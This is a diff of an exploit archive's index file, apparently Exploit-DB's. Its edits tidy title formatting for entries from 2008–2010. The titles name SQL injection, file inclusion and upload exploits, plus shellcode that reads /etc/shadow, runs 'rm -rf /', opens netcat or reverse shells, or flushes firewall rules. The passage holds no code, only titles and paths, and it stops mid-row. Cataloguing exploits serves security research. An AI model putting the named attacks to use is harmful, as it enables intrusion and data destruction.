12686,platforms/php/webapps/12686.txt,"Online University (Auth Bypass) SQL Injection Vulnerability",2010-05-21,cr4wl3r,php,webapps,0 -12687,platforms/windows/dos/12687.pl,"WinDirectAudio (.WAV) PoC",2010-05-21,ahwak2000,windows,dos,0 -12688,platforms/php/webapps/12688.txt,"JV2 Folder Gallery <==3.1 (gallery.php) Remote File Inclusion Vulnerability",2010-05-21,"Sn!pEr.S!Te hacker",php,webapps,0 +12687,platforms/windows/dos/12687.pl,"WinDirectAudio (.WAV) PoC",2010-05-21,ahwak2000,windows,dos,0 +12688,platforms/php/webapps/12688.txt,"JV2 Folder Gallery <= 3.1 - (gallery.php) Remote File Inclusion Vulnerability",2010-05-21,"Sn!pEr.S!Te hacker",php,webapps,0 12689,platforms/multiple/webapps/12689.txt,"Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console",2010-05-21,"Richard Brain",multiple,webapps,0 12690,platforms/php/webapps/12690.php,"cardinalCms 1.2 (fckeditor) Arbitrary File Upload Exploit.",2010-05-21,Ma3sTr0-Dz,php,webapps,0 12691,platforms/php/webapps/12691.txt,"Online Job Board (Auth Bypass) SQL Injection Vulnerability",2010-05-21,cr4wl3r,php,webapps,0 @@ -11567,12 +11567,12 @@ id,file,description,date,author,platform,type,port 12696,platforms/php/webapps/12696.txt,"E-commerce Group (cat.php) SQL Injection Vulnerability",2010-05-22,"BLack Revenge",php,webapps,0 12697,platforms/php/webapps/12697.php,"hustoj (fckeditor) Remote Arbitrary File Upload Exploit",2010-05-22,eidelweiss,php,webapps,0 12698,platforms/windows/dos/12698.py,"Open&Compact Ftp Server 1.2 ""PORT"" command Remote DoS",2010-05-22,Ma3sTr0-Dz,windows,dos,0 -12699,platforms/php/webapps/12699.txt,"eWebEditor v1.x (WYSIWYG) Remote File Upload",2010-05-22,Ma3sTr0-Dz,php,webapps,0 +12699,platforms/php/webapps/12699.txt,"eWebEditor 1.x - (WYSIWYG) Remote File Upload",2010-05-22,Ma3sTr0-Dz,php,webapps,0 12700,platforms/asp/webapps/12700.txt,"DotNetNuke Remote File upload Vulnerability",2010-05-22,"Ra3cH and Ma3sTr0-Dz",asp,webapps,0 12701,platforms/asp/webapps/12701.txt,"Rave Creations/UHM (artists.asp) SQL Injection Vulnerability",2010-05-22,Ra3cH,asp,webapps,0 12702,platforms/php/webapps/12702.php,"ECShop Search.php SQL Injection Exploit",2010-05-22,Jannock,php,webapps,0 12703,platforms/php/webapps/12703.txt,"Recipes Website 1.0 SQL Injection",2010-05-22,Mr.ThieF,php,webapps,0 -12704,platforms/windows/dos/12704.txt,"Media Player Classic - v 1.3.1774.0 (.rm file) buffer Overflow poc",2010-05-23,"sniper ip",windows,dos,0 +12704,platforms/windows/dos/12704.txt,"Media Player Classic - v 1.3.1774.0 (.rm file) buffer Overflow poc",2010-05-23,"sniper ip",windows,dos,0 12706,platforms/php/webapps/12706.txt,"MMA Creative Design SQL Injection Vulnerability",2010-05-23,XroGuE,php,webapps,0 12707,platforms/php/webapps/12707.txt,"runt-communications Design SQL Injection Vulnerability",2010-05-23,XroGuE,php,webapps,0 12709,platforms/php/webapps/12709.txt,"webperformance Ecommerce SQL Vulnerability",2010-05-23,cyberlog,php,webapps,0 @@ -11585,20 +11585,20 @@ id,file,description,date,author,platform,type,port 12716,platforms/php/webapps/12716.txt,"runt-communications Design (property_more.php) SQL Injec.Vulnerability",2010-05-24,CoBRa_21,php,webapps,0 12717,platforms/php/webapps/12717.txt,"Telia Web Design (index.php) SQL Injection Vulnerability",2010-05-24,CoBRa_21,php,webapps,0 12718,platforms/php/webapps/12718.txt,"BBMedia Design's (news_more.php) SQL Injection Vulnerability",2010-05-24,gendenk,php,webapps,0 -12719,platforms/php/webapps/12719.txt,"PHP Graphy <== 0.9.7 (index.php) Remote Command Execution Vulnerability",2010-05-24,"Sn!pEr.S!Te Hacker",php,webapps,0 -12720,platforms/php/webapps/12720.txt,"Schaf-CMS 1.0 SQL Injection Vulnerability",2010-05-24,Manas58,php,webapps,0 -12721,platforms/php/webapps/12721.txt,"Apache Axis2(1.4.1) Local File Inclusion Vulnerability",2010-05-24,HC,php,webapps,0 +12719,platforms/php/webapps/12719.txt,"PHP Graphy <= 0.9.7 - (index.php) Remote Command Execution Vulnerability",2010-05-24,"Sn!pEr.S!Te hacker",php,webapps,0 +12720,platforms/php/webapps/12720.txt,"Schaf-CMS 1.0 SQL Injection Vulnerability",2010-05-24,Manas58,php,webapps,0 +12721,platforms/php/webapps/12721.txt,"Apache Axis2 1.4.1 - Local File Inclusion Vulnerability",2010-05-24,HC,php,webapps,0 12722,platforms/php/webapps/12722.txt,"interuse Website Builder & design (index2.php) SQL Injection Vulnerability",2010-05-24,CoBRa_21,php,webapps,0 12723,platforms/php/webapps/12723.py,"Joomla com_qpersonel SQL Injection Remote Exploit",2010-05-24,"Valentin Hoebel",php,webapps,0 12724,platforms/php/webapps/12724.php,"WebAsys blindSQL-inj exploit",2010-05-24,zsh.shell,php,webapps,0 12725,platforms/php/webapps/12725.txt,"ALSCO CMS SQL Injection Vulnerabilities",2010-05-24,PrinceofHacking,php,webapps,0 12726,platforms/php/webapps/12726.txt,"REvolution <= 10.02 CSRF (Cross-Site Request Forgery)",2010-05-24,"High-Tech Bridge SA",php,webapps,0 12727,platforms/php/webapps/12727.txt,"LiSK CMS v 4.4 SQL Injection Vulnerability",2010-05-24,"High-Tech Bridge SA",php,webapps,0 -12728,platforms/windows/webapps/12728.txt,"Microsoft Outlook Web Access (OWA) version 8.2.254.0 information disclosure vulnerability",2010-05-24,"Praveen Darshanam",windows,webapps,0 +12728,platforms/windows/webapps/12728.txt,"Microsoft Outlook Web Access (OWA) 8.2.254.0 - Information Disclosure vulnerability",2010-05-24,"Praveen Darshanam",windows,webapps,0 12729,platforms/php/webapps/12729.txt,"Blox CMS SQL Injection Vulnerability",2010-05-24,CoBRa_21,php,webapps,0 12730,platforms/multiple/webapps/12730.txt,"ProWeb Design SQL Injection Vulnerability",2010-05-24,cyberlog,multiple,webapps,0 -12731,platforms/php/webapps/12731.txt,"Webloader v8 SQL Injection Vulnerability",2010-05-24,ByEge,php,webapps,0 -12732,platforms/php/webapps/12732.php,"JV2 Folder Gallery 3.1.1 (popup_slideshow.php) Multiple Vulnerability",2010-05-24,eidelweiss,php,webapps,0 +12731,platforms/php/webapps/12731.txt,"Webloader 8 - SQL Injection Vulnerability",2010-05-24,ByEge,php,webapps,0 +12732,platforms/php/webapps/12732.php,"JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability",2010-05-24,eidelweiss,php,webapps,0 12734,platforms/asp/webapps/12734.txt,"Blaze Apps Multiple Vulnerabilities",2010-05-24,"AmnPardaz ",asp,webapps,0 12735,platforms/php/webapps/12735.txt,"NITRO Web Gallery SQL Injection Vulnerability",2010-05-25,cyberlog,php,webapps,0 12736,platforms/php/webapps/12736.txt,"Website Design and Hosting By Netricks, Inc (news.php) SQL Injection Vulnerability",2010-05-25,"Dr.SiLnT HilL",php,webapps,0 @@ -11608,9 +11608,9 @@ id,file,description,date,author,platform,type,port 12743,platforms/php/webapps/12743.txt,"web5000 (page_show) SQL Injection Vulnerability",2010-05-25,"BLack Revenge",php,webapps,0 12744,platforms/php/webapps/12744.txt,"Webit Cms SQL Injection Vulnerability",2010-05-25,CoBRa_21,php,webapps,0 12746,platforms/php/webapps/12746.txt,"Spaceacre (SQL/XSS/HTML) Injection Vulnerabilities",2010-05-26,XroGuE,php,webapps,0 -12748,platforms/php/webapps/12748.txt,"Multi Vendor Mall (pages.php) SQL Injection Vulnerability",2010-05-26,Newbie_Campuz,php,webapps,0 +12748,platforms/php/webapps/12748.txt,"Multi Vendor Mall (pages.php) SQL Injection Vulnerability",2010-05-26,Newbie_Campuz,php,webapps,0 12749,platforms/php/webapps/12749.txt,"Book Gallery (aboutbook.php) SQL Injection Vulnerability",2010-05-26,Mr.P3rfekT,php,webapps,0 -12750,platforms/windows/webapps/12750.txt,"RapidWareX v2.0.1 (WebUI) CSRF Exploit",2010-05-26,l3D,windows,webapps,0 +12750,platforms/windows/webapps/12750.txt,"RapidWareX 2.0.1 - (WebUI) CSRF Exploit",2010-05-26,l3D,windows,webapps,0 12751,platforms/windows/dos/12751.pl,"Adobe Photoshop CS4 Extended 11.0 ABR File Handling Remote Buffer Overflow PoC",2010-05-26,LiquidWorm,windows,dos,0 12752,platforms/windows/dos/12752.c,"Adobe Photoshop CS4 Extended 11.0 GRD File Handling Remote Buffer Overflow PoC",2010-05-26,LiquidWorm,windows,dos,0 12753,platforms/windows/dos/12753.c,"Adobe Photoshop CS4 Extended 11.0 ASL File Handling Remote BoF PoC",2010-05-26,LiquidWorm,windows,dos,0 @@ -11620,7 +11620,7 @@ id,file,description,date,author,platform,type,port 12761,platforms/php/webapps/12761.txt,"GlobalWebTek Design SQL Injection Vulnerability",2010-05-27,cyberlog,php,webapps,0 12762,platforms/freebsd/dos/12762.txt,"FreeBSD 8.0 ftpd off-by one PoC (FreeBSD-SA-10:05)",2010-05-27,"Maksymilian Arciemowicz",freebsd,dos,0 12763,platforms/php/webapps/12763.txt,"Script Upload Up Your Shell (Sql Inject)",2010-05-27,MouDy-Dz,php,webapps,0 -12766,platforms/php/webapps/12766.txt,"PPhlogger <== 2.2.5 (trace.php) Remote Command Execution Vulnerability",2010-05-27,"Sn!pEr.S!Te hacker",php,webapps,0 +12766,platforms/php/webapps/12766.txt,"PPhlogger <= 2.2.5 - (trace.php) Remote Command Execution Vulnerability",2010-05-27,"Sn!pEr.S!Te hacker",php,webapps,0 12767,platforms/php/webapps/12767.txt,"parlic Design (SQL/XSS/HTML) Multiple Vulnerabilities",2010-05-27,XroGuE,php,webapps,0 12768,platforms/php/webapps/12768.txt,"Hampshire Trading Standards Script SQL Injection Vulnerability",2010-05-27,Mr.P3rfekT,php,webapps,0 12769,platforms/php/webapps/12769.txt,"Joomla Component MediQnA LFI vulnerability",2010-05-27,kaMtiEz,php,webapps,0 @@ -11629,14 +11629,14 @@ id,file,description,date,author,platform,type,port 12772,platforms/php/webapps/12772.txt,"Realtor WebSite System E-Commerce SQL Injection Vulnerability",2010-05-27,cyberlog,php,webapps,0 12773,platforms/php/webapps/12773.txt,"Realtor Real Estate Agent (idproperty) SQL Injection Vulnerability",2010-05-28,v3n0m,php,webapps,0 12774,platforms/windows/dos/12774.py,"HomeFTP Server r1.10.3 (build 144) Denial of Service Exploit",2010-05-28,Dr_IDE,windows,dos,0 -12775,platforms/multiple/dos/12775.py,"VLC Media Player <=1.0.6 Malformed Media File Crash PoC",2010-05-28,Dr_IDE,multiple,dos,0 +12775,platforms/multiple/dos/12775.py,"VLC Media Player <= 1.0.6 - Media File Crash PoC",2010-05-28,Dr_IDE,multiple,dos,0 12776,platforms/php/webapps/12776.txt,"Realtor WebSite System E-Commerce idfestival SQL Injection Vulnerability",2010-05-28,CoBRa_21,php,webapps,0 12777,platforms/php/webapps/12777.txt,"Realtor Real Estate Agent (news.php) SQL Injection Vulnerability",2010-05-28,v3n0m,php,webapps,0 12779,platforms/php/webapps/12779.txt,"Joomla Component My Car Multiple Vulnerabilities",2010-05-28,Valentin,php,webapps,0 12780,platforms/php/webapps/12780.txt,"Joomla Component BF Quiz SQL Injection Vulnerability",2010-05-28,Valentin,php,webapps,0 12781,platforms/php/webapps/12781.txt,"Joomla Component com_jepoll (pollid) SQL Injection Vulnerability",2010-05-28,v3n0m,php,webapps,0 12782,platforms/php/webapps/12782.txt,"Joomla Component com_jejob 1.0 (catid) SQL Injection Vulnerability",2010-05-28,v3n0m,php,webapps,0 -12785,platforms/php/webapps/12785.pl,"YourArcadeScript v2.0b1 Blind SQL Injection",2010-05-28,DNX,php,webapps,0 +12785,platforms/php/webapps/12785.pl,"YourArcadeScript 2.0b1 - Blind SQL Injection",2010-05-28,DNX,php,webapps,0 12786,platforms/windows/webapps/12786.txt,"fusebox (ProductList.cfm?CatDisplay) Remote SQL Injection Vulnerability",2010-05-29,Shamus,windows,webapps,0 12787,platforms/php/webapps/12787.txt,"Nucleus Plugin Gallery RFI & SQLi Vulnerability",2010-05-29,AntiSecurity,php,webapps,0 12788,platforms/php/webapps/12788.txt,"Marketing Web Design Multiple Vulnerabilities",2010-05-29,XroGuE,php,webapps,0 @@ -11648,30 +11648,30 @@ id,file,description,date,author,platform,type,port 12796,platforms/php/webapps/12796.txt,"Joomla Component BF Quiz SQL Injection Exploit",2010-05-29,"Valentin Hoebel",php,webapps,0 12797,platforms/php/webapps/12797.txt,"(Webiz) local SHELL Upload Vulnerability",2010-05-29,kannibal615,php,webapps,0 12798,platforms/php/webapps/12798.txt,"(Webiz) SQL Injection Vulnerability",2010-05-29,kannibal615,php,webapps,0 -12801,platforms/php/webapps/12801.txt,"Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass",2010-05-30,Flyff666,php,webapps,0 -12803,platforms/windows/local/12803.html,"IP2location.dll v1.0.0.1 Function Initialize() Buffer Overflow",2010-05-30,sinn3r,windows,local,0 +12801,platforms/php/webapps/12801.txt,"Oscommerce Online Merchant 2.2 - File Disclosure And Admin ByPass",2010-05-30,Flyff666,php,webapps,0 +12803,platforms/windows/local/12803.html,"IP2location.dll 1.0.0.1 - Function Initialize() Buffer Overflow",2010-05-30,sinn3r,windows,local,0 12804,platforms/multiple/remote/12804.txt,"nginx [engine x] http server <= 0.6.36 Path Draversal",2010-05-30,cp77fk4r,multiple,remote,0 12805,platforms/php/webapps/12805.txt,"Zeeways Script Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0 12806,platforms/php/webapps/12806.txt,"CMScout (XSS/HTML Injection) Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0 12807,platforms/php/webapps/12807.txt,"Creato Script SQL Injection Vulnerability",2010-05-30,Mr.P3rfekT,php,webapps,0 12808,platforms/php/webapps/12808.txt,"PTC Site's RCE/XSS Vulnerability",2010-05-30,CrazyMember,php,webapps,0 12809,platforms/php/webapps/12809.txt,"Symphony CMS Local File Inclusion Vulnerability",2010-05-30,AntiSecurity,php,webapps,0 -12811,platforms/php/webapps/12811.txt,"Oscommerce Online Merchant v2.2 - Remote File Upload",2010-05-30,MasterGipy,php,webapps,0 +12811,platforms/php/webapps/12811.txt,"Oscommerce Online Merchant 2.2 - Remote File Upload",2010-05-30,MasterGipy,php,webapps,0 12812,platforms/php/webapps/12812.txt,"Joomla com_quran SQL Injection vulnerability",2010-05-30,r3m1ck,php,webapps,0 12813,platforms/php/webapps/12813.txt,"WsCMS SQL Injection Vulnerability [ Multiple Vulnerabilities ]",2010-05-31,cyberlog,php,webapps,0 12814,platforms/php/webapps/12814.txt,"Joomla Component com_g2bridge LFI vulnerability",2010-05-31,akatsuchi,php,webapps,0 12815,platforms/windows/remote/12815.txt,"GoAheaad Webserver Source Code Disclosure Vulnerability",2010-05-30,Sil3nt_Dre4m,windows,remote,0 12816,platforms/windows/dos/12816.py,"ZipExplorer 7.0 (.zar) DoS",2010-05-31,TecR0c,windows,dos,0 -12817,platforms/php/webapps/12817.txt,"QuickTalk v1.2 (Source code disclosure) Multiple Vulnerabilities",2010-05-31,indoushka,php,webapps,0 -12818,platforms/php/webapps/12818.txt,"e107 0.7.21 full Mullti (RFI/XSS) Vulnerabilities",2010-05-31,indoushka,php,webapps,0 -12819,platforms/php/webapps/12819.txt,"Persian E107 XSS Vulnerability",2010-05-31,indoushka,php,webapps,0 +12817,platforms/php/webapps/12817.txt,"QuickTalk 1.2 - Multiple Vulnerabilities (Source Code Disclosure)",2010-05-31,"indoushka salah el ddine",php,webapps,0 +12818,platforms/php/webapps/12818.txt,"e107 0.7.21 full Mullti (RFI/XSS) Vulnerabilities",2010-05-31,"indoushka salah el ddine",php,webapps,0 +12819,platforms/php/webapps/12819.txt,"Persian E107 XSS Vulnerability",2010-05-31,"indoushka salah el ddine",php,webapps,0 12820,platforms/php/webapps/12820.txt,"Visitor Logger (banned.php) Remote File Include Vulnerability",2010-05-31,bd0rk,php,webapps,0 12821,platforms/windows/local/12821.py,"Mediacoder v0.7.3.4672 SEH Exploit",2010-05-31,Stoke,windows,local,0 12822,platforms/php/webapps/12822.txt,"Joomla Component com_jsjobs SQL Injection Vulnerability",2010-05-31,d0lc3,php,webapps,0 12823,platforms/php/webapps/12823.txt,"musicbox sql injection",2010-05-31,titanichacker,php,webapps,0 12833,platforms/asp/webapps/12833.txt,"Patient folder (THEME ASP) Local SQL Injection Vulnerability",2010-05-31,"SA H4x0r",asp,webapps,0 12834,platforms/windows/remote/12834.py,"XFTP 3.0 Build 0239 Long filename Buffer Overflow",2010-06-01,sinn3r,windows,remote,0 -12839,platforms/php/webapps/12839.txt,"Hexjector Persistent XSS (<=v1.0.7.2)",2010-06-01,Hexon,php,webapps,0 +12839,platforms/php/webapps/12839.txt,"Hexjector <= 1.0.7.2 - Persistent XSS",2010-06-01,Hexon,php,webapps,0 12840,platforms/php/webapps/12840.txt,"Delivering Digital Media CMS SQL Injection Vulnerability",2010-06-01,"Dr.0rYX and Cr3w-DZ",php,webapps,0 12841,platforms/asp/webapps/12841.txt,"Ticimax E-Ticaret (SQL Injection)",2010-06-01,Neuromancer,asp,webapps,0 12842,platforms/php/webapps/12842.txt,"Joomla Component ChronoConnectivity",2010-06-02,_mlk_,php,webapps,0 @@ -11681,15 +11681,15 @@ id,file,description,date,author,platform,type,port 12849,platforms/php/webapps/12849.txt,"slogan design Script SQL Injection Vulnerability",2010-06-03,Mr.P3rfekT,php,webapps,0 12850,platforms/php/webapps/12850.txt,"Member ID The Fish Index PHP SQL Injection Vulnerability",2010-06-03,v4lc0m87,php,webapps,0 12852,platforms/windows/webapps/12852.txt,"QtWeb 3.3 Remote DoS/Crash Exploit",2010-06-03,PoisonCode,windows,webapps,0 -12853,platforms/windows/dos/12853.py,"Quick 'n Easy FTP Server Lite Version 3.1",2010-06-03,b0nd,windows,dos,0 -12855,platforms/php/webapps/12855.txt,"phpBazar V2.1.1 stable rfi Vulnerability",2010-06-03,Sid3^effects,php,webapps,0 -12856,platforms/php/webapps/12856.txt,"osCSS 1.2.1 (REMOTE FILE UPLOAD) Vulnerabilities",2010-06-03,indoushka,php,webapps,0 -12857,platforms/php/webapps/12857.txt,"E-book Store Mullti Vulnerability",2010-06-03,indoushka,php,webapps,0 -12858,platforms/php/webapps/12858.txt,"Article Management System 2.1.2 Reinstall Vulnerability",2010-06-03,indoushka,php,webapps,0 -12859,platforms/php/webapps/12859.txt,"Advneced Management For Services Sites (File Disclosure) Vulnerabilities",2010-06-03,indoushka,php,webapps,0 +12853,platforms/windows/dos/12853.py,"Quick 'n Easy FTP Server Lite 3.1",2010-06-03,b0nd,windows,dos,0 +12855,platforms/php/webapps/12855.txt,"phpBazar 2.1.1 stable - rfi Vulnerability",2010-06-03,Sid3^effects,php,webapps,0 +12856,platforms/php/webapps/12856.txt,"osCSS 1.2.1 (REMOTE FILE UPLOAD) Vulnerabilities",2010-06-03,"indoushka salah el ddine",php,webapps,0 +12857,platforms/php/webapps/12857.txt,"E-book Store Mullti Vulnerability",2010-06-03,"indoushka salah el ddine",php,webapps,0 +12858,platforms/php/webapps/12858.txt,"Article Management System 2.1.2 Reinstall Vulnerability",2010-06-03,"indoushka salah el ddine",php,webapps,0 +12859,platforms/php/webapps/12859.txt,"Advneced Management For Services Sites (File Disclosure) Vulnerabilities",2010-06-03,"indoushka salah el ddine",php,webapps,0 12861,platforms/php/webapps/12861.txt,"PHP SETI@home web monitor (phpsetimon) RFI / LFI Vulnerability",2010-06-03,eidelweiss,php,webapps,0 12865,platforms/hardware/remote/12865.txt,"Motorola SURFBoard Cable Modem Directory Traversal",2010-06-03,"S2 Crew",hardware,remote,0 -12866,platforms/php/webapps/12866.txt,"K9 Kreativity Design (pages.php) SQL Injection Vulnerability",2010-06-03,Newbie_Campuz,php,webapps,0 +12866,platforms/php/webapps/12866.txt,"K9 Kreativity Design (pages.php) SQL Injection Vulnerability",2010-06-03,Newbie_Campuz,php,webapps,0 12867,platforms/php/webapps/12867.txt,"clickartweb Design SQL Injection Vulnerability",2010-06-03,cyberlog,php,webapps,0 12868,platforms/php/webapps/12868.txt,"Joomla Component com_lead SQL Injection",2010-06-03,ByEge,php,webapps,0 13241,platforms/aix/shellcode/13241.txt,"Aix execve /bin/sh 88 bytes",2004-09-26,"Georgi Guninski",aix,shellcode,0 @@ -11717,9 +11717,9 @@ id,file,description,date,author,platform,type,port 13263,platforms/freebsd_x86/shellcode/13263.txt,"freebsd/x86 connect back.send.exit /etc/passwd 112 bytes",2008-09-10,suN8Hclf,freebsd_x86,shellcode,0 13264,platforms/freebsd_x86/shellcode/13264.txt,"freebsd/x86 kill all processes 12 bytes",2008-09-09,suN8Hclf,freebsd_x86,shellcode,0 13265,platforms/freebsd_x86/shellcode/13265.c,"freebsd/x86 rev connect, recv, jmp, return results 90 bytes",2008-09-05,sm4x,freebsd_x86,shellcode,0 -13266,platforms/freebsd_x86/shellcode/13266.asm,"freebsd/x86 /bin/cat /etc/master.passwd (NULL free) 65 bytes",2008-08-25,sm4x,freebsd_x86,shellcode,0 +13266,platforms/freebsd_x86/shellcode/13266.asm,"freebsd/x86 /bin/cat /etc/master.passwd (NULL free) 65 bytes",2008-08-25,sm4x,freebsd_x86,shellcode,0 13267,platforms/freebsd_x86/shellcode/13267.asm,"freebsd/x86 reverse portbind /bin/sh 89 bytes",2008-08-21,sm4x,freebsd_x86,shellcode,0 -13268,platforms/freebsd_x86/shellcode/13268.asm,"freebsd/x86 setuid(0); execve(ipf -Fa); shellcode 57 bytes",2008-08-21,sm4x,freebsd_x86,shellcode,0 +13268,platforms/freebsd_x86/shellcode/13268.asm,"freebsd/x86 setuid(0); execve(ipf -Fa); shellcode 57 bytes",2008-08-21,sm4x,freebsd_x86,shellcode,0 13269,platforms/freebsd_x86/shellcode/13269.c,"freebsd/x86 encrypted shellcode /bin/sh 48 bytes",2008-08-19,c0d3_z3r0,freebsd_x86,shellcode,0 13270,platforms/freebsd_x86/shellcode/13270.c,"freebsd/x86 portbind 4883 with auth shellcode",2006-07-19,MahDelin,freebsd_x86,shellcode,0 13271,platforms/freebsd_x86/shellcode/13271.c,"freebsd/x86 reboot(RB_AUTOBOOT) Shellcode 7 bytes",2006-04-19,IZ,freebsd_x86,shellcode,0 @@ -11740,11 +11740,11 @@ id,file,description,date,author,platform,type,port 13286,platforms/generator/shellcode/13286.c,"Alphanumeric Shellcode Encoder Decoder",2008-08-04,"Avri Schneider",generator,shellcode,0 13287,platforms/generator/shellcode/13287.txt,"Download & Exec polymorphed shellcode Engine",2007-01-24,"YAG KOHHA",generator,shellcode,0 13288,platforms/generator/shellcode/13288.c,"Utility for generating HTTP/1.x requests for shellcodes",2006-10-22,izik,generator,shellcode,0 -13289,platforms/generator/shellcode/13289.c,"Multi-Format Shellcode Encoding Tool - Beta v2.0 (w32)",2005-12-16,SkyLined,generator,shellcode,0 +13289,platforms/generator/shellcode/13289.c,"Multi-Format Shellcode Encoding Tool - Beta 2.0 (w32)",2005-12-16,SkyLined,generator,shellcode,0 13290,platforms/hardware/shellcode/13290.txt,"Version-independent IOS shellcode",2008-08-21,"Andy Davis",hardware,shellcode,0 -13291,platforms/hardware/shellcode/13291.txt,"Cisco IOS Connectback shellcode v1.0",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0 -13292,platforms/hardware/shellcode/13292.txt,"Cisco IOS Bind shellcode v1.0",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0 -13293,platforms/hardware/shellcode/13293.txt,"Cisco IOS Tiny shellcode v1.0",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0 +13291,platforms/hardware/shellcode/13291.txt,"Cisco IOS Connectback Shellcode 1.0",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0 +13292,platforms/hardware/shellcode/13292.txt,"Cisco IOS Bind Shellcode 1.0",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0 +13293,platforms/hardware/shellcode/13293.txt,"Cisco IOS Tiny Shellcode 1.0",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0 13294,platforms/hardware/shellcode/13294.txt,"Cisco IOS Shellcode And Exploitation Techniques (BlackHat)",2005-08-01,"Michael Lynn",hardware,shellcode,0 13295,platforms/hp-ux/shellcode/13295.txt,"HPUX execve /bin/sh 58 bytes",2004-09-26,k2,hp-ux,shellcode,0 13296,platforms/lin_amd64/shellcode/13296.c,"linux/amd64 flush iptables rules shellcode 84 bytes",2008-11-28,gat3way,lin_amd64,shellcode,0 @@ -11793,7 +11793,7 @@ id,file,description,date,author,platform,type,port 13339,platforms/lin_x86/shellcode/13339.asm,"linux/x86 connect back.send.exit /etc/shadow 155 bytes",2008-08-18,0in,lin_x86,shellcode,0 13340,platforms/lin_x86/shellcode/13340.c,"linux/x86 writes a php connectback shell to the fs 508 bytes",2008-08-18,GS2008,lin_x86,shellcode,0 13341,platforms/lin_x86/shellcode/13341.c,"linux/x86 rm -rf / attempts to block the process from being stopped",2008-08-18,onionring,lin_x86,shellcode,0 -13342,platforms/lin_x86/shellcode/13342.c,"linux/x86 setuid(0) . setgid(0) . aslr_off 79 bytes",2008-08-18,LiquidWorm,lin_x86,shellcode,0 +13342,platforms/lin_x86/shellcode/13342.c,"linux/x86 setuid(0) . setgid(0) . aslr_off 79 bytes",2008-08-18,LiquidWorm,lin_x86,shellcode,0 13343,platforms/lin_x86/shellcode/13343.asm,"linux/x86 raw-socket ICMP/checksum shell 235 byte",2007-04-02,mu-b,lin_x86,shellcode,0 13344,platforms/lin_x86/shellcode/13344.c,"linux/x86 /sbin/iptables -F 40 bytes",2007-03-09,"Kris Katterjohn",lin_x86,shellcode,0 13345,platforms/lin_x86/shellcode/13345.c,"linux/x86 kill all processes 11 bytes",2007-03-09,"Kris Katterjohn",lin_x86,shellcode,0 @@ -12025,7 +12025,7 @@ id,file,description,date,author,platform,type,port 13645,platforms/windows/shellcode/13645.c,"JITed egg-hunter stage-0 shellcode",2010-03-20,"Alexey Sintsov",windows,shellcode,0 13647,platforms/windows/shellcode/13647.txt,"win32/xp sp3 (Ru) WinExec+ExitProcess cmd shellcode 12 bytes",2010-03-24,"lord Kelvin",windows,shellcode,0 13648,platforms/win32/shellcode/13648.rb,"Shellcode - Win32 MessageBox (Metasploit module)",2010-03-24,corelanc0d3r,win32,shellcode,0 -13649,platforms/windows/shellcode/13649.txt,"JITed egg-hunter stage-0 shellcode Adjusted universal for xp/vista/win7",2010-03-27,"Alexey Sintsov",windows,shellcode,0 +13649,platforms/windows/shellcode/13649.txt,"JITed egg-hunter stage-0 shellcode Adjusted universal for xp/vista/win7",2010-03-27,"Alexey Sintsov",windows,shellcode,0 13661,platforms/linux/shellcode/13661.txt,"linux x86 nc -lvve/bin/sh -p13377 shellcode",2010-04-02,Anonymous,linux,shellcode,0 13669,platforms/linux/shellcode/13669.c,"36 bytes chmod(""/etc/shadow"", 0666) shellcode",2010-04-14,Magnefikko,linux,shellcode,0 13670,platforms/linux/shellcode/13670.c,"25 bytes execve(""/bin/sh"") shellcode",2010-04-14,Magnefikko,linux,shellcode,0 @@ -12066,25 +12066,25 @@ id,file,description,date,author,platform,type,port 13732,platforms/linux/shellcode/13732.c,"x86 linux hard / unclean reboot (33 bytes)",2010-06-03,gunslinger_,linux,shellcode,0 13733,platforms/solaris/shellcode/13733.c,"Solaris/x86 - SystemV killall command - 39 bytes",2010-06-03,"Jonathan Salwan",solaris,shellcode,0 13735,platforms/osx/remote/13735.py,"OS X EvoCam Web Server Buffer Overflow Exploit 3.6.6 and 3.6.7",2010-06-05,d1dn0t,osx,remote,8080 -13736,platforms/php/webapps/13736.txt,"DDLCMS v2.1 (skin) Remote File Inclusion Vulnerability",2010-06-06,eidelweiss,php,webapps,0 +13736,platforms/php/webapps/13736.txt,"DDLCMS 2.1 - (skin) Remote File Inclusion Vulnerability",2010-06-06,eidelweiss,php,webapps,0 13737,platforms/php/webapps/13737.txt,"Joomla Component com_djartgallery Multiple Vulnerabilities",2010-06-06,d0lc3,php,webapps,0 13738,platforms/php/webapps/13738.txt,"PHP Director 0.2 Sql Injection",2010-06-06,Mr.Rat,php,webapps,0 -13739,platforms/php/webapps/13739.txt,"XSS, SQL injection vulnerability in WmsCMS",2010-06-06,Ariko-Security,php,webapps,0 -13740,platforms/php/webapps/13740.txt,"iScripts eSwap v2.0 sqli and xss vulnerability",2010-06-06,Sid3^effects,php,webapps,0 -13741,platforms/php/webapps/13741.txt,"iScripts easybiller v1.1 sqli vulnerability",2010-06-06,Sid3^effects,php,webapps,0 +13739,platforms/php/webapps/13739.txt,"WmsCMS - XSS, SQL injection vulnerability",2010-06-06,Ariko-Security,php,webapps,0 +13740,platforms/php/webapps/13740.txt,"iScripts eSwap 2.0 - sqli and xss vulnerability",2010-06-06,Sid3^effects,php,webapps,0 +13741,platforms/php/webapps/13741.txt,"iScripts easybiller 1.1 - SQL Injection Vulnerability",2010-06-06,Sid3^effects,php,webapps,0 13742,platforms/linux/shellcode/13742.c,"48 bytes chown root:root /bin/sh x86 linux shellcode",2010-06-06,gunslinger_,linux,shellcode,0 13743,platforms/linux/shellcode/13743.c,"45 bytes give all user root access when execute /bin/sh x86 linux shellcode",2010-06-06,gunslinger_,linux,shellcode,0 13744,platforms/php/webapps/13744.txt,"RTRandomImage Remote File Inclusion Vulnerability",2010-06-06,"Sn!pEr.S!Te Hacker",php,webapps,0 13745,platforms/php/webapps/13745.txt,"Sphider Script Remote Code Execution",2010-06-06,XroGuE,php,webapps,0 13746,platforms/php/webapps/13746.txt,"Joomla Component com_searchlog SQL Injection",2010-06-06,d0lc3,php,webapps,0 -13747,platforms/php/webapps/13747.txt,"PHP car rental complete System 